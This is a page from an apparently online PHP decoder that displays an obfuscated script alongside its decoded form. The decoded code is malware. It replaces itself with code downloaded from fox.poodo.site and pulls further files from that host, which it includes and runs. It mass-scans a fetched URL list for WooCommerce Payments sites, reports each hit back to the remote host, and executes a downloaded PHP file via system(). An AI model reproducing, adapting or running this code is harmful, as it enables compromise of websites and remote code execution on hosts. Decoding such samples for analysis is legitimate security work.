Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto fn5lt; eoaZF: system("\x70\150\160\40\151\x6e\x63\56\143\154\141\x73\163\x2e\167\x6f..
Decoded Output download
<? goto fn5lt; eoaZF: system("php inc.class.woop.php"); goto KgK1P; USX1o: date_default_timezone_set("Europe/Kiev"); goto BvvSz; P1G9b: $AC = new AngryCurl("callback_function"); goto gPIJm; IIsNy: file_put_contents("list.txt", file_get_contents("http://fox.poodo.site/st/list.txt")); goto cgA3z; gLtk3: ini_set("max_execution_time", 0); goto m5PxW; m5PxW: ini_set("memory_limit", "512M"); goto USX1o; fn5lt: file_put_contents(basename(__FILE__), file_get_contents("http://fox.poodo.site/st/get_woop.txt")); goto IIsNy; LZKfv: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $hostname = $parse["host"]; $AC->get($url); } goto IwjXe; m8D0P: file_put_contents("angry.txt", file_get_contents("http://fox.poodo.site/st/angry.txt")); goto gLtk3; cgA3z: file_put_contents("roll.txt", file_get_contents("http://fox.poodo.site/st/roll.txt")); goto m8D0P; rG5jD: function callback_function($response, $info, $request) { if (preg_match("~(wcpay)~i", $response, $out)) { $login = "woop"; $password = ''; echo PHP_EOL . " ===================== ok: ===================== " . $info["url"] . " - " . $login . ":" . $password . '' . PHP_EOL; file_get_contents("http://fox.poodo.site/cms3.php?we=" . base64_encode($info["url"]) . "&fe=" . base64_encode("inc.class.cms.3.woop.php") . "&cm=" . base64_encode("3") . "&sl=" . base64_encode($login) . "&sp=" . base64_encode($password)); goto end; } end: return; } goto P1G9b; EbTzj: require_once "angry.txt"; goto rG5jD; IwjXe: $AC->execute(50); goto eoaZF; BvvSz: require_once "roll.txt"; goto EbTzj; N6ACF: $f = fopen("http://fox.poodo.site/get_woop.php", "r"); goto LZKfv; gPIJm: $AC->load_useragent_list("list.txt"); goto N6ACF; KgK1P: ?>
Did this file decode correctly?
Original Code
goto fn5lt; eoaZF: system("\x70\150\160\40\151\x6e\x63\56\143\154\141\x73\163\x2e\167\x6f\157\160\56\x70\x68\160"); goto KgK1P; USX1o: date_default_timezone_set("\105\x75\162\157\160\x65\57\x4b\151\145\166"); goto BvvSz; P1G9b: $AC = new AngryCurl("\143\x61\x6c\154\x62\141\x63\153\x5f\x66\x75\x6e\x63\164\x69\157\156"); goto gPIJm; IIsNy: file_put_contents("\x6c\x69\163\164\56\x74\x78\x74", file_get_contents("\150\164\x74\160\72\57\57\146\157\x78\56\160\157\x6f\x64\157\x2e\x73\x69\x74\x65\x2f\163\164\x2f\x6c\151\x73\164\x2e\164\x78\x74")); goto cgA3z; gLtk3: ini_set("\x6d\x61\170\x5f\x65\170\145\x63\x75\x74\151\157\156\x5f\x74\151\155\145", 0); goto m5PxW; m5PxW: ini_set("\155\145\155\157\x72\171\137\x6c\x69\155\x69\164", "\x35\x31\62\115"); goto USX1o; fn5lt: file_put_contents(basename(__FILE__), file_get_contents("\150\x74\x74\x70\72\x2f\x2f\146\x6f\x78\56\x70\x6f\x6f\x64\157\56\163\x69\x74\x65\57\163\x74\57\x67\x65\x74\137\167\x6f\x6f\x70\x2e\164\x78\x74")); goto IIsNy; LZKfv: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $hostname = $parse["\150\x6f\x73\164"]; $AC->get($url); } goto IwjXe; m8D0P: file_put_contents("\x61\x6e\147\x72\171\x2e\164\170\x74", file_get_contents("\x68\x74\164\x70\72\x2f\57\x66\x6f\x78\x2e\160\x6f\157\144\157\x2e\x73\151\x74\x65\57\163\x74\x2f\141\156\x67\x72\171\56\164\170\164")); goto gLtk3; cgA3z: file_put_contents("\x72\x6f\x6c\154\56\x74\170\x74", file_get_contents("\x68\164\x74\160\72\57\x2f\x66\157\x78\56\x70\x6f\x6f\144\x6f\x2e\x73\x69\x74\145\x2f\163\164\x2f\x72\157\x6c\154\56\164\x78\x74")); goto m8D0P; rG5jD: function callback_function($response, $info, $request) { if (preg_match("\x7e\x28\x77\143\160\141\171\51\176\x69", $response, $out)) { $login = "\167\157\x6f\x70"; $password = ''; echo PHP_EOL . "\40\x3d\75\x3d\x3d\x3d\75\x3d\75\x3d\75\75\x3d\75\x3d\75\75\x3d\75\75\75\75\40\x6f\x6b\72\x20\75\x3d\75\75\x3d\75\75\75\75\75\75\x3d\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\x20\40" . $info["\165\x72\154"] . "\x20\55\x20" . $login . "\72" . $password . '' . PHP_EOL; file_get_contents("\150\164\x74\x70\x3a\57\57\146\157\x78\x2e\160\157\157\144\x6f\x2e\x73\x69\x74\x65\57\143\155\163\63\56\160\150\x70\77\167\145\x3d" . base64_encode($info["\x75\x72\154"]) . "\x26\146\145\75" . base64_encode("\x69\x6e\143\56\143\154\x61\163\x73\x2e\x63\x6d\x73\56\x33\x2e\167\157\x6f\x70\56\x70\x68\160") . "\46\x63\x6d\75" . base64_encode("\x33") . "\46\x73\154\x3d" . base64_encode($login) . "\46\163\160\x3d" . base64_encode($password)); goto end; } end: return; } goto P1G9b; EbTzj: require_once "\x61\156\147\162\171\x2e\164\x78\164"; goto rG5jD; IwjXe: $AC->execute(50); goto eoaZF; BvvSz: require_once "\162\157\x6c\154\56\x74\170\x74"; goto EbTzj; N6ACF: $f = fopen("\150\164\164\x70\72\57\x2f\x66\157\170\56\x70\x6f\157\x64\157\x2e\163\x69\164\x65\57\x67\x65\x74\x5f\x77\x6f\157\x70\56\x70\150\160", "\162"); goto LZKfv; gPIJm: $AC->load_useragent_list("\x6c\151\x73\x74\x2e\164\170\164"); goto N6ACF; KgK1P: ?>
Function Calls
None |
Stats
MD5 | 2ffd7bc50bc96c7d485ae4158b205201 |
Eval Count | 0 |
Decode Time | 44 ms |